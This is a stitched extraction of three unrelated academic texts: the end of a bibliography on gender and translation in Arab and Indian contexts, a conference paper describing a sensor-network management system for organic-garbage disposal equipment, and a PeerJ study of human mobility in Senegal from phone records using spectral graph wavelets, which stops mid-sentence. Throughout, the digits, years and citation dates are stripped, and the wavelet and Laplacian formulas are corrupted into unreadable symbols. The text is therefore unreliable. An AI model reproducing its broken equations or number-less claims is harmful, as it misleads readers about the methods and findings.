al-bazie s. . youtube video. retrieved from https://youtu.be/skiprwil y al-dabbagh m, ramadan a. translating “gender” in the arab world: implications for public policy (in arabic). idafat: arab j soc. ; ( ): – . al-khalili j. the house of wisdom: how arabic science saved ancient knowledge and gave us the renaissance. london: penguin; . alsultany e. arabs and muslims in the media. new york: new york university press; . amin q. the liberation of women and the new woman: two documents in the history of egyptian feminism. (peterson, s. trans.). cairo: the american university in cairo press (originally published in and ); . amireh a. arab women writer’s problems and prospects. al-jadid. ; ( ): – . banerji r. why kali wont rage, a critique of indian feminism. gender forum. ; , http://www.genderforum.org/issues/ passages-to-india/why-kali-wont-rage/ bassnett s, trivedi h. postcolonial translation: theory and practice. london: routledge; . page of alsharekh. qscience connect :tii. https://youtu.be/skiprwil y http://www.genderforum.org/issues/passages-to-india/why-kali-wont-rage/ http://www.genderforum.org/issues/passages-to-india/why-kali-wont-rage/ boothe m. egyptian women writers in english translation. in: classe o, ed. encyclopedia of literary translation into english: a-l. volume . chicago, il: fitzroy dearborn; : – . chakravarty r. translating tagore: shifting paradigms. in: banjeri d, ed. rabindranath tagore in the st century: theoretical renewals. new delhi: springer; : – . chamberlain l. gender and the metaphorics of translation. signs. ; ( ): – . chavez c. address to the commonwealth club in california. retrieved from http://www.chavezfoundation.org/_cms.php? mode¼view&b_code¼ &b_no¼ &page¼ &field¼&key¼&n¼ ; , november . cohen c. #rapagainstrape: two indian women rapping about rape go viral. the telegraph, http://www.telegraph.co.uk/ women/womens-life/ /rapagainstrape-indian-girls-rape-rap-video-has-gone-viral.html , march . de beauvoir s. the second sex. (borde, c., trans.). new york: first vantage books. (original work published ); . devika j. being “in-translation” in a post-colony. transl stud. ; ( ): – . gebeily m. meet estaygazat, syria’s online feminist movement. al-monitor, http://www.al-monitor.com/pulse/originals/ / /syria-women-estayqazat-movement-sexuality.html; , march . hatim b, munday j. translation: an advanced resource book. london: routledge; . jayawardena k. feminism and nationalism in the third world. london: zed books; . kothari r. translating india. london, uk: routledge; . lorde a. the master’s tools will never dismantle the master’s house. sisters outsiders: essays and speeches. ( ) ed. berkley, ca: crossing press; : – . mernissi f. the forgotten queens of islam. polity press; . mitchell j. women, the longest revolution. new york: pantheon books; . moghadam v. modernizing women: gender and social change in the middle east. boulder, co: lynne reiner; . moure e, translation is a political act. youtube video. retrieved from http://www.youtube.com/watch?v¼bhv bnipbag . munday j. the routledge companion to translation studies. london: routledge; . pandey i. romantic feminism in hindi novels written by women. house of letters; . rape: it’s your fault. youtube video. retrieved from https://www.youtube.com/watch?v¼ hc ng_ajpy sadiqi f. women, gender, and language in morocco. leiden: brill; . safar online. website. http://www.sikhfeministresearch.org simon s. gender in translation: cultural identity and the politics of transmission. london and new york: routledge; . spivak g. a critique of postcolonial reason: towards a history of the vanishing present. harvard university press; . spivak g. the politics of translation. in: bal m, ed. narrative theory: political narratology. routledge; : – . the blank noise project. srishti university website http://srishti.ac.in/centers-and-labs/blank-noise page of alsharekh. qscience connect :tii. http://www.chavezfoundation.org/_cms.php?mode=view&b_code= &b_no= &page= &field=&key=&n= http://www.chavezfoundation.org/_cms.php?mode=view&b_code= &b_no= &page= &field=&key=&n= http://www.telegraph.co.uk/women/womens-life/ /rapagainstrape-indian-girls-rape-rap-video-has-gone-viral.html http://www.telegraph.co.uk/women/womens-life/ /rapagainstrape-indian-girls-rape-rap-video-has-gone-viral.html http://www.al-monitor.com/pulse/originals/ / /syria-women-estayqazat-movement-sexuality.html http://www.al-monitor.com/pulse/originals/ / /syria-women-estayqazat-movement-sexuality.html http://www.youtube.com/watch?v=bhv bnipbag https://www.youtube.com/watch?v= hc ng_ajpy http://www.sikhfeministresearch.org http://srishti.ac.in/centers-and-labs/blank-noise paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) organic garbage disposal equipment management system based on wsn liu bocheng school of software, nanchang university nanchang, china e-mail: jsjjcjx@ .com cao ye school of software, nanchang university nanchang, china e-mail: @ .com song jialei school of software, nanchang university nanchang, china e-mail: ncusc_bysj@ .com abstract—huge amount of organic garbage produced by cites with urbanization rapid development. garbage disposal equipment were put into use in large scale. traditional measures of equipment management is no more efficient. this paper focuses on realizing informationization and systematization of equipment management through software technology. keywords-garbage disposal; equipment management; ensor; wsn this paper analyzed the requirement of the system and related work process. the system should be able to manage basic information of staff and equipment, receiving data returned from sensors and reminding staff when equipment is abnormal. staff can set the operation status of equipment via the system. based on modular programming ideas, then the paper designed the functional modules: personnel management, rights management, equipment management, real-time simulation, task management and fault management. finally complete the full function of the system, providing the information management way for the management of organic waste equipment, improving the efficiency of the staff and enhancing the modern management level of the enterprise. i. introduction the staff can manage the equipment and tasks and monitor the real-time status of the equipment through computer. therefore, it can improve the efficiency of equipment management, reduce the enterprise's investment in human resources and promote the informatization of management[ ]. the concept of informatization is gradually applied to the management of garbage disposal equipment. according to the analysis of the development trend of china's garbage disposal industry, the waste treatment is gradually adopting high technology and the level is getting higher and higher. in the case of waste separation, the application of automatic equipment, landfill site construction and application of bioengineering technology to improve the efficiency of waste incineration power generation system through thermal physical heat transfer technology[ ]. the scale of equipment management is increasing and the complexity of management is improving. the traditional way of equipment management gradually does not meet the demand of production. network technology can effectively integrate resources and realize sharing, which is being applied to equipment management, thus improving operation and management efficiency[ ]. ii. system analysis a. system demand analysis the main purpose of the system is to improve the management efficiency of waste disposal equipment and realize the network management. the following requirements are summarized by the analysis of the system.  in order to facilitate user operation, it is necessary to provide a good operation interface. the interface design should conform to the basic aesthetics, the system response speed should be fast, and the operation process should be standardized and reasonable.  to set different permissions for different personnel roles so as to maintain the system security and run steadily.  it will be able to manage user information, such as adding, deleting and modifying user information.  it will be able to manage the basic information of the equipment, such as adding, deleting and modifying basic information of the equipment.  the operator can carry out task management, add tasks according to the arrangement, and can generate task reports and submit them to the administrator for review.  the operator can through the system to run the equipment parameters settings, such as equipment internal temperature, the humidity inside the equipment, power equipment, etc., so that the equipment will be in good running condition.  the operator can check the operation of the system in real time and monitor the equipment. mailto:jsjjcjx@ .com international conference on sensor network and computer engineering (icsnce )  in the case of equipment failure, the system can notify operators in different ways, such as sending text messages, page pop-up prompts, etc. b. system function analysis ) user management user can check their personal information and change their passwords. the administrator can manage user information after login, such as adding, deleting, modifying user information and modifying users' permission. ) task management administrators distribute tasks by the system, distribute them to executives, and review the submitted tasks. the task performer modifies the status of the task according to the progress of the task, and then submits the task or gives it to the next performer. ) equipment management the operator can manage the basic information by the system, such as add, delete, modify the basic information of the equipment, and can view the equipment operation manual, at the same time they can intuitively see location of the equipment through the map. ) device control the operator changes the operating parameters of the equipment, such as internal temperature, internal humidity and machine power, so as to control the operation state of the equipment and improve the operation efficiency of the equipment. ) real-time monitoring the operator can monitor the machine and check the running status of the machine in real time. ) fault management system can detect the abnormality of the device and notify the operator via sms or webpage reminder, and the fault information will be added to the fault log. iii. system design a. overall system design the overall design of the system is to carry out the overall plan for the previous analysis, and provide concrete solutions for the realization of the system. the organic waste recycling operation management system not only needs real- time monitoring of the equipment, but also can manage the equipment and improve the working efficiency of the users. according to business function, business process, we design corresponding function and business logic design. and by analyzing the data and entity types involved in the system, the design of the database will be completed. b. system architecture the architecture of the software system is as follows. figure . system architecture view layer handles the interface presentation and user interaction. business layer handles the request sent by the user and returns the result of the request to the view layer. at the same time, you will get the data needed by the view layer by calling the persistence layer's mapper interface. persistence layer connects to the database, and the data will be processed by the mapper interface. c. system function design through the business analysis of the system, the system function is divided into the following contents according to the module. figure . function module the functions of each module are as follows: ) user permission management different users have different executable rights, and from the business logic, it needs to set different roles for different users, which is conducive to the system's safe and stable operation. international conference on sensor network and computer engineering (icsnce ) ) user information management manage user information, including add, delete, modify, and other basic operations. ) personal information view view all personal information and be able to change the password. ) equipment information management management equipment information, including adding, modifying, and deleting equipment information and other basic operations. ) equipment location view display the corresponding location on the map according to the device address. ) device running state setting. the user sets the internal humidity, temperature and power of the device during operation, thus making the device in a high efficient state of processing. ) single device monitoring simulates the data sent by the sensor and monitors the state of a single device in real time. the state parameters include the internal temperature of the device, the internal humidity of the equipment and the power of the equipment. ) district profile carry out statistical analysis of equipment quantity information in the area. ) warning prompt sending when the temperature, humidity or power of the device exceeds the threshold, the system will send a warning to the device owner via text message or the page pop-up box. ) fault information record when the device fails, the system records the specific fault information. the user needs to modify the status of the fault according to the fault. ) assignment of tasks the administrator arranges specific tasks through the system and pushes them to the executor. ) task management the user can update the status of the task in real time according to the task. when the task is completed, it can be submitted to the administrator for review or continued to be pushed to the next executor. ordinary users manage their own tasks, and administrators can manage all tasks. iv. system implementation a. holistic structure the system is managed by maven,and the required reference packages are placed in the pom.xml.first,we deploy the package structure according to the system function. the functions of each package are as follows.  com.ssm.controller contains the related classes of the spring controller.  com.ssm.entity contains the entity types associated with the project.  com.ssm.mapper contains the relevant interface files and corresponding xml files for the operation database.  com.ssm.service contains the service interface associated with spring.  com.ssm.serviceimpl is the implementation of the interface in com.ssm. service.  the mybatis package contains the configuration file sqlmapconfig.xml for mybatis.  spring packages contains spring-related configuration files, including the database configuration management file applicationcontext- dao.xml and view management configuration file springmvc.xml and spring security configuration file applicationcontent-security.xml.  db.properties is the connection profile for the database.。  log j.properties is the configuration file for the output log.  src/main/webapp contains the jsp pages and the imported javascript files. b. function implementation ) login inplementation input user name and password, the corresponding form will be submitted to the information to the spring security processing, if the information from spring security that match in the database information , it will be send to the corresponding user requests, load the corresponding menu resources, access to the system home page url. if it does not match to the corresponding information, redirect to the login page. spring security needs to implement this functionality, in addition to implementing the corresponding configuration in applications-security.xml. ) equipment management information user can view the information of the device, add, modify, delete, search, and export the required information to excel. after clicking the location button, the user can view the location of the device. the map uses baidu map interface to realize, click the geographical position button and then the location of the device and the device number information will be displayed on the map. ) employee management user can view the basic information of the employee and add, delete or find there information. you can also set the users’ role. and you can select the columns you want to export to an excel. the table uses bootstrap table to dynamically load employee information. international conference on sensor network and computer engineering (icsnce ) ) district profile click the district profile button, the map of the country will be displayed, and the depth of the color will be directly proportional to the number of devices. this part is mainly showing the distribution of the equipment from different regions of the country, it uses echarts to implement, and complete the drill down function of secondary map, click each province will enter the corresponding city’s information interface, each city’s information using a scatter diagram showing the number of devices. when the mouse is hovering over the provinces, the relevant devices amount will be prompted. ) lan monitoring user can check the temperature, humidity and power of the device, and the warning threshold, and modify or delete information of the device. click on the status button to view the real-time state of the device, and the real-time state data is simulated using the random number. the dynamic line chart is realized by echarts. the temperature, humidity and power data of the device will be transmitted to controller in real-time. if any abnormal data is found, the device will send sms messages to the equipment manager. sms prompts use the sms interface provided by the internet provider. ) task list users can categorize tasks according to the urgency of the task, and can delete task information and manage the tasks. ) fault log when a device fails, the system generates a fault log. user can check the fault information of the device and solve the state of the fault. v. conclusion the organic garbage disposal equipment management system achieves multiple functions such as the rights management, user management, equipment management, equipment monitoring, fault management and early warning, task management, and provides reference for garbage disposal equipment information management. the system generally operates normally and smoothly. graphical interactive interface is pleasing to the eye. it can respond quickly to various operations like addition, deletion, search etc. it can effectively improve the management efficiency of the equipment, optimize the business process, reduce the investment in management, and improve the modern management level of the enterprise. there are some deficiencies in the system, which need further improvement: ( ) the real-time monitoring part of the equipment uses the simulation data. in practice, it needs to receive the data sent back by the sensor. the integration will be realized in the follow-up work. ( ) when the number of devices is huge, the query speed of the system will be reduced. optimization of the query algorithm is needed to improve the response speed of the system. ( ) the regional general situation only counts the number of devices in different regions, and it could analyze more factors, such as equipment model, abnormal equipment, etc. references [ ] chi xun,wang baojie,study on composting treatment pattern of rural living organicwaste,journal of shandong agricultural university. natural science,china,vol. ,pp. - , [ ] hu shang-qin,hu guo,research on producing the alcohol from the organic garbage fermentation, st international conference on energy and environmental protection (iceep ),advanced materials research vol. ,pp. - , [ ] zhang xilin,study on the garbage disposal in urban park based on the circulation ecoomy theory,journal of anhui agricultural sciences vol. pp. - , , identifying multiscale spatio-temporal patterns in human mobility using manifold learning identifying multiscale spatio-temporal patterns in human mobility using manifold learning james r. watson, zach gelbaum, mathew titus, grant zoch and david wrathall college of earth, ocean and atmospheric sciences, oregon state university, corvallis, or, usa abstract when, where and how people move is a fundamental part of how human societies organize around every-day needs as well as how people adapt to risks, such as economic scarcity or instability, and natural disasters. our ability to characterize and predict the diversity of human mobility patterns has been greatly expanded by the availability of call detail records (cdr) from mobile phone cellular networks. the size and richness of these datasets is at the same time a blessing and a curse: while there is great opportunity to extract useful information from these datasets, it remains a challenge to do so in a meaningful way. in particular, human mobility is multiscale, meaning a diversity of patterns of mobility occur simultaneously, which vary according to timing, magnitude and spatial extent. to identify and characterize the main spatio-temporal scales and patterns of human mobility we examined cdr data from the orange mobile network in senegal using a new form of spectral graph wavelets, an approach from manifold learning. this unsupervised analysis reduces the dimensionality of the data to reveal seasonal changes in human mobility, as well as mobility patterns associated with large-scale but short-term religious events. the novel insight into human mobility patterns afforded by manifold learning methods like spectral graph wavelets have clear applications for urban planning, infrastructure design as well as hazard risk management, especially as climate change alters the biophysical landscape on which people work and live, leading to new patterns of human migration around the world. subjects agents and multi-agent systems, algorithms and analysis of algorithms, data science, network science and online social networks, spatial and geographic information systems keywords complex systems, manifold learning, human mobility, dimension reduction, prediction, geographic information science, multiscale, emergence, wavelet, networks introduction human mobility is a fundamental part of how individuals, households and communities organize to meet every-day needs, and to respond to infrequent risks and shocks like economic instability and environmental hazards. human mobility is multiscale in nature (song et al., a), that is for any given type of mobility, such as commuting, seasonal migration or holiday travels, individuals move as part of social collectives of varying size and interconnectivity, which span different magnitudes of spatial and temporal scale. human mobility also has multiple spatio-temporal modes of variability: people go to work each day, they go on holiday during specific programed periods within the year, they may how to cite this article watson jr, gelbaum z, titus m, zoch g, wrathall d. . identifying multiscale spatio-temporal patterns in human mobility using manifold learning. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted april published june corresponding author james r. watson, james.watson@oregonstate.edu academic editor chakchai so-in additional information and declarations can be found on page doi . /peerj-cs. copyright watson et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:james.�watson@�oregonstate.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ migrate before and after key agricultural seasons, or they may evacuate during floods or other environmental hazards (widhalm et al., ). for these reasons and others, it is a continuing challenge to identify, categorize and anticipate the various patterns of human mobility (simini et al., ). anticipating and planning for human mobility is a non-trivial task for organizations whose core functions provide critical services to and address the needs of moving people, such as urban planning and transport agencies, disaster first-responders and international aid organizations (jiang, ferreira & gonzalez, ). to overcome these challenges and generate fundamental insight on human mobility, novel data generated by users of the digital infrastructure (e.g., mobile phone subscribers) is now being used. so-called big data, routinely collected from a range of sources, including social platforms like twitter, flickr and facebook (barbosa et al., ) and most notably the explosion of mobile phone usage throughout the world, provides rich information on users’ locations through time (giannotti et al., ). mobile network operators collect records of their users’ calling patterns, a type of data called call detail records (cdr), which include the location of the receiving tower where each voice call or text message is made, as well as the location of the recipient. over time, each user’s calling patterns can be used to reconstruct a detailed record of their location history. the collective mobility history of all users’ movements through time provides insight on total population flows between all cellular network locations during any specified period of time. this enables the study of users’ behaviors at very high spatiotemporal resolution over both local and system-level spatial scales at time scales of minutes to months to years (song et al., b). as each phone is embedded within an existing social fabric, cdr allow the analysis of the changing structure of social organization as people (i.e., individuals, social networks, communities, religious and ethnic groups, etc.) respond to a diversity of stimuli. cdr data has been used for urban planning (becker et al., ), and to describe and evaluate commuting (iqbal et al., ) and environmental displacement resulting from earthquakes and hurricanes (lu et al., ; lu, bengtsson & holme, ). they have also been used to evaluate mobility as a vector for the spread of infectious diseases such as ebola (wesolowski et al., a, b; balcan et al., ; belik, geisel & brockmann, ). cdr data offer a vastly clearer and more detailed description of the communication and mobility behaviors of people as they go about their daily lives, compared to traditional data on human mobility, such as surveys and censuses, which are collected at relatively coarse time-scales, that is, months and years (bell & ward, ). cdrs are compiled by network operators principally for the purposes of billing customers for their use of the network, not for scientific analysis; therefore, the main challenge with analyzing cdr is the size, complexity and richness of datasets. cdr are inherently high dimensional and noisy (chen & zhang, ), and quantitative analyses must incorporate dimensional reduction and denoising approaches. once done, the remaining challenge is retrieving a relevant signal from the data at the appropriate spatial and temporal scale for each specific mobility pattern (song et al., b). here, we describe a data-driven approach to cdr analysis that explicitly addresses the multiscale nature of the mobility patterns embedded in the data and reflected in watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the system under study. we analyzed cdr from users of the orange/sonatel cellular network, collected in senegal between january and december (see fig. for an illustration of mobility in senegal for a given day). de-identified data entries included information on the time of the call, the mobile phone tower used and the duration of call. to identify and characterize different spatio-temporal modes of human mobility captured in cdr, we developed a novel computational approach based on spectral graph wavelets, an extension of classical wavelet analysis to the setting of networks. there are now numerous examples of where cdr data has been used to understand patterns of human mobility (jarv, ahas & witlox, ; calabrese et al., ; dobra, williams & eagle, ), including those that also explicitly address multiscale patterns (phithakkitnukoon, smoreda & olivier, ) using methods from statistical physics (lambiotte et al., ; simini et al., ). here, we have made new mathematical advances to spectral graph wavelets to improve upon these state of the art approaches to the multiscale decomposition of cdr data. in doing so we were able to identify and characterize various multiscale spatio-temporal patterns of human mobility in senegal for the year . to demonstrate the utility of our approach we focused on dynamic multiscale mobility patterns to/from a specific city in senegal—touba, a market town and religious center in senegal’s agricultural breadbasket. our goal was to identify and characterize the figure map of senegal with major cellular communication towers: these are the nodes in our human mobility networks. nodes are color coded and sized by population density and edges connect- ing them highlight the density and complexity of human communication and mobility networks. these networks are changing over time, and in senegal there are many large-scale mobility events, relating to religious events (often held at touba, the focal city of this study) as well as to seasonal changes in weather and agriculture. full-size doi: . /peerj-cs. /fig- watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ different spatio-temporal patterns of human mobility that contrast in overall spatial scale and temporal duration. we focus on inter-city forms of mobility to/from touba, including seasonal migration relating to changes in agriculture and a mobile labor force, as well as punctuated patterns relating to calendar festivals, local elections, or religious holidays. the identification and interpretation of these spatio-temporal scales and patterns of human mobility is of value to the ultimate goal of extracting key dynamics from complex adaptive systems in general. methods human mobility data to analyze the multiscale nature of human mobility, we developed a new approach to spectral graph wavelets which we then applied to de-identified, pre-processed extracts of cdr from the orange/sonatel mobile network in senegal generated between january and december , . these data were obtained from the orange telecom data for development challenge (d d) and are highly sensitive. as a consequence they cannot be made publicly available, but can be obtained by contacting orange. these data include a number of variables on individual mobility behaviors/locations for , randomly sampled users on a rolling -week basis. these data were arranged into a pairwise origin-destination network whose vertices, or nodes, are cell towers and whose edges are weighted by the volume of phones moving/flowing between each tower pair for each -h period over the entire year of . to highlight inter-city mobility, we first aggregated the cell towers of key cities into single nodes, following administrative boundaries. then, for each h period, a one was added to a given edge i,j if a phone moved from node i to node j. to further filter out intra-city mobility, repeated trips between the same towers for the same user within a -period were not counted. this effectively removes “double” trips, and leaves the one-way trips, for example home-work commutes. after all this, mobility was defined and quantified as an asymmetric affinity matrix a varying through time, where aij(t) is the total number of unique trips made by users between towers i and j on day t of (see fig. a for a geographic representation for one of these daily affinity matrices). in order to normalize the data so that the signal from high volume mobility in areas such as dakar, the capital of senegal, did not wash out all other signals, we calculated relative mobility by dividing the entries of a(t), by their respective row sums. in this way the number of trips on a given day from a given node are now weighted by the amount of people moving from that node. in order to perform the sgw analysis, we then converted this asymmetric affinity matrix to a symmetric one by taking the average of two-way mobility patterns between pairs of cell-towers. last, so as to not include intra-city traffic, we set the diagonal of a to zero. the result was a symmetric affinity matrix/network with zeros on the diagonal for every day of . multiscale analysis using spectral graph wavelets networks of human mobility and communication are naturally modeled by graphs, sets of nodes connected by edges, each with an associated weight representing the strength of the connection. here, higher edge weights indicate a greater flow of human migration watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between the edge’s two endpoints. graphs can be viewed as discrete analogs of smooth objects such as geometric manifolds and surfaces, and the geometric content of these graphs is often analyzed using an associated laplacian operator (chung, ; coifman & lafon, ), as it encodes the structure of the graph in a natural way. in particular, its eigenfunctions can be used to construct a family of wavelets, which allows one to decompose functions in the same spirit as the indispensable fourier analytic approach to time series analysis. this is the starting point of our study. in fourier analysis, one uses eigenfunctions {ϕk} of the laplacian as basis vectors and their associated eigenvalues {λk} inform us of the functions’ features: larger eigenvalues are associated to higher frequency or, equivalently, smaller scale variations, and lower eigenvalues correspond to the large-scale features. these functions ϕk are, however, supported across the entire domain in question, and so a function’s fourier coefficients ck ¼ hfk; f i, integrate features from disparate regions in the domain. wavelet families, on the other hand, allow one to perform a similar analysis while restricting attention to a local region defined by a central point and a scale, or radius. given that human mobility networks are inherently multiscale as well as highly heterogeneous, a method is required that is both multiscale and localized. in the classical settings of time series analysis and image analysis, wavelets were developed to exhibit precisely these two traits. here we employed a generalization of wavelets to graphs, called spectral graph wavelets. spectral graph wavelets have been previously used to study human mobility, for example automobile traffic (mohan et al., ), in analyzing human mobility from photo activity via flickr (dong et al., ), and in general clustering and community detection (tremblay & borgnat, ). an important first choice to make when employing spectral graph wavelets is the shape of the wavelet to be used, or in other words the “wavelet kernel". this can have a profound effect on the analysis. in particular, we employed a wavelet kernel based specifically on the heat kernel yielding what we call hermitian graph wavelets (for details of the mathematical analysis see: gelbaum, titus & watson, ), which allows us to associate explicit radii to the wavelets rather than a scale parameter that is independent of any metric on the graph. by using these wavelets, we were able to produce a data analysis method that efficiently extracted key geometric information from the time-varying human mobility networks a(t). this approach provides a decomposition whose components may be ordered by importance. whereas in a fourier decomposition the largest coefficients ck indicate the eigenfunctions which contain most of the original function’s information, in the present study the norm of the wavelet gives a measure of the gross data encoded by it. the outputs of this analysis are a set of wavelet functions associated to each vertex (i.e. for every cell tower in senegal), as well as a single dominant scale for each vertex representing the scale containing the most information for that vertex. by fixing a choice of vertex and observing how the wavelet at the dominant scale evolves over time we have a vastly simplified geometric summary of how the graph structure is changing near the focal vertex. as a result, these wavelet functions are rich in multiscale geometric content, and we used watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ them to identify and characterize different forms or modes of human mobility that occur throughout senegal over the year . applying spectral graph wavelets to mobility networks given the set of daily affinity matrices, a(t), the application of spectral graph wavelets is as follows. first, for each of the daily affinity matrices, we constructed their associated laplacian matrices: dðtÞ ¼ dðtÞ � aðtÞ where dðtÞii ¼ p j ðaðtÞÞi;j and d(t)ij = for i ≠ j. once done, the eigenvectors and eigenvalues of δ(t), {ϕk,t} and {λk,t} respectively, were then computed. then, hermitian graph wavelets were formed as: cs;xðyÞ ¼ x k s�kðtÞe�s�kðtÞfk;tðxÞfk;tðyÞ ( ) for a chosen set of scales s∈{sn} (note that ψs,x(y) = ψs,y(x)). these functions exhibit several properties that make them ideal for decomposing signals measured on large and complex networks: they are localized, in that they provide information for every node, and the power of each wavelet (i.e., its norm, as a vector) gives us a measure of its importance with respect to the global network structure (gelbaum, titus & watson, ). this is analogous to classical fourier analysis where large fourier coefficients in the decomposition of a function indicate the major modes comprising the function. rather than forming an orthonormal set, the wavelet functions {ψsn,x} form a frame and rather than the classical parseval equality, an approximate parseval equality holds: for a function f on the network there are constants < b < c < ∞ with bkf k � x sn;x jhf ; csn;xij � ckf k where kf k ¼ x x jf ðxÞj with the sum taken over all nodes x in the network. the values of b and c depend both on choice of wavelet kernel and the scales chosen. it is always possible to choose scales and (by renormalizing if necessary) achieve a frame with the values of b and c as close to as desired (hammond, vandergheynst & gribonval, ). the determination of the scales {sn} input into the algorithm is largely ad hoc and some trial and error is required. while it is up to the investigator to make this choice, some general points can be made: the chosen scales should always be positive and the largest should not be too much bigger than the largest eigenvalue. the goal is to get a good partitioning of the interval [ , max {λ(t) }] relative to the spacing of the eigenvalues, but as the eigenvalues are in general not uniformly spaced some experimentation may be required to find the resolution that is most informative. having a well distributed set of scales will also ensure that the watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ calculation of wavelet power is not sensitive to small changes in the network’s structure or the specific scales chosen. in other words, calculations will be stable. with an appropriately chosen set of scales, if we let f be a delta function at node z, f = δz(meaning f(z) = and f(x) = for all other nodes x ≠ z), the above parseval bounds and ψs,x(y) = ψs,y(x) symmetry imply that ¼ kf k � x sn;x jhf ; csn;xij ¼ x sn x x jcsn;zðxÞj ¼ x sn kcsn;zk thus the values of ||ψsn,z|| serve to indicate the relative importance of each scale with respect to the vertex z. in this way, large values of ||ψsn,z|| correspond to the major scales of importance at the node z. we utilize this intuition and define the dominant scale at each vertex to be sðz; tÞ ¼ arg maxsnkcsn;zk ( ) this measures the scale at which a given vertex is most well-connected to the rest of the network. the above hermitian graph wavelet functions yield a multiscale analysis at each vertex in the graph (i.e., for every cell tower in senegal). to highlight the ability of spectral graph wavelets to identify multiscale patterns, we chose to build our wavelets with a fixed base point at the vertex corresponding to the city of touba (denoted xt), and track the scale of the dominant wavelet function s(xt,t) as above, through time. we abbreviate this as s(t). we thus obtain a sequence of dominant wavelet functions on the network ψs(t),xt(t,y), where the first argument indicates the dependance on the changing network structure encoded in a(t) and the second argument y corresponds to vertices of the graph on which the function takes its values. results to demonstrate the utility of spectral graph wavelets for identifying the main spatio-temporal scales and patterns of human mobility, we calculated dominant wavelet functions centered on touba, the market city in senegal’s central breadbasket and an important site for religious festivals, and compared results with those produced from a basic analysis of the original population flow data. more specifically, for any given day, human mobility to/from a given location can be extracted from the mobilitymatrices a(t) and visually inspected (fig. a). doing so for touba, one finds that large cities such as dakar on the west coast account for most of the total daily flow in and out of touba (i.e., compare the location of large red nodes in fig. a). in contrast, fig. b depicts the dominant wavelet function for the same day as plotted in fig. a. the function ψs(t),xt(t,y) revealsa distinct spatial pattern, with a large positive value centered on touba, that rapidly diminishes to negative values in surrounding nodes, before approaching zero at geographically remote nodes. we note that despite the fact that the wavelet function was calculated using only the population flow data, and not any explicit spatial distance between location pairs, the dependance of human traffic on the watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distance traveled (i.e., the proximity of touba to other locations) is apparent in the resulting wavelet function. in other words, we are observing a strong spatial autocorrelation in human mobility levels, which is both intuitive and expected. figure (a) cell-towers (i.e., human mobility nodes) in senegal color coded by the log number of people moving to/from touba on a random day in , and sized by local population density. (b) in contrast, colors now denote the dominant wavelet function centered on touba for the same day. here, node size remains proportional to local population density. the two maps reveal very differ- ent information. in (a) mobility to/from the major urban hubs, such as dakar the capital, are identified and in (b) the shape of the dominant wavelet function is highlighted: wavelet function values are positive at touba (the large red node near the center of senegal) decreasing to large negative values in nearby towns, before becoming less negative at far-off towns). full-size doi: . /peerj-cs. /fig- watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to characterize changes in human mobility through time, focusing on touba, we first examined changes in the total traffic to/from touba over time (fig. a); this is calculated by summing the mobility values to/from touba at all locations for each day (i.e., taking a row-sum of a given affinity matrix a(t)). log total mobility to/from touba over time reveals a variety of qualitative features, most striking is a large peak in traffic corresponding to the commemoration of touba’s mosque’s th anniversary, which occurred may th, (day ), as well as the end of ramadan august th, (day ) and eid al-adha on october (day ). we then clustered days based upon origin-destination flow values in a(t). for each day the vector of mobility values to/from touba were extracted from the mobility matrices a(t). we clustered days based on these values, using the louvain method for community detection (blondel et al., ). this involved calculating the euclidean distance figure (a) time-series of the log total mobility to/from touba for , colored by group id produced from clustering days based on their mobility values. this cluster analysis identifies mobility associated with the dry (green) and wet (blue) seasons (with an transitionary phase in gray), and there are peaks in total traffic to/from touba that correspond with major religious events at day , and ; however, the cluster analysis does not recognize these events as distinct. (b) in contrast, changes over time in the scale associated with the dominant wavelet function (centered on touba) better reveals the punc- tuated and large-scale mobility events related to religious celebrations (vertical red lines) and senegal’s independence day (blue vertical line). in addition, using these dominant wavelet functions to cluster days extracts meaningful information about seasonal migration (points in green and blue), as well as the short- term/large-spatial scale events (points in gray). full-size doi: . /peerj-cs. /fig- watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between days based on their mobility values, and running the algorithm numerous times because it is non-deterministic. we chose the louvain method primarily because it provides an objective determination of the number of clusters. this is in contrast to other common clustering approaches which require the number of clusters to be chosen (e.g., k-means). a sensitivity test of the louvain method, as well as other community detection/clustering approaches is provided in the supplemental material. clustering these mobility data for touba identified two main time periods, corresponding to seasonal changes in the senegalese weather and agriculture, as the rainy season begins around september. there is a third cluster corresponding to a short intermediate period (see fig. a, changes in the marker color: green, gray and blue correspond to the dry, intermediate and wet seasons respectively). interestingly, the clustering only picked out these long-term changes in mobility, and not the short-punctuated events relating to religious festivals or political events. this is because while these kinds of short-term events are associated with a change in total traffic to/from touba, any topological changes in the inter-city traffic profile are obscured by the complexity and irregularity of the data. in contrast to these results created by analyzing the raw mobility values, clustering dominant wavelet functions over time revealed more nuanced information about mobility in senegal in . clustering was done using ψs(t),xt(t,y) in place of population flow values: we calculated the euclidean distance between daily pairs of touba-centered wavelet functions, before using the louvain community detection algorithm to identify clusters. like the analysis of the relative population flow values described above, this clustering of daily wavelet functions identifies changes in human mobility relating to the dry and wet season. importantly however, now the presence of relatively short-term and large-scale events were identified throughout the year. these events are marked by a short-term widening of the wavelet function centered on touba (in network space), and correspond to the three religious migration events listed above. in addition, other events are identified: the 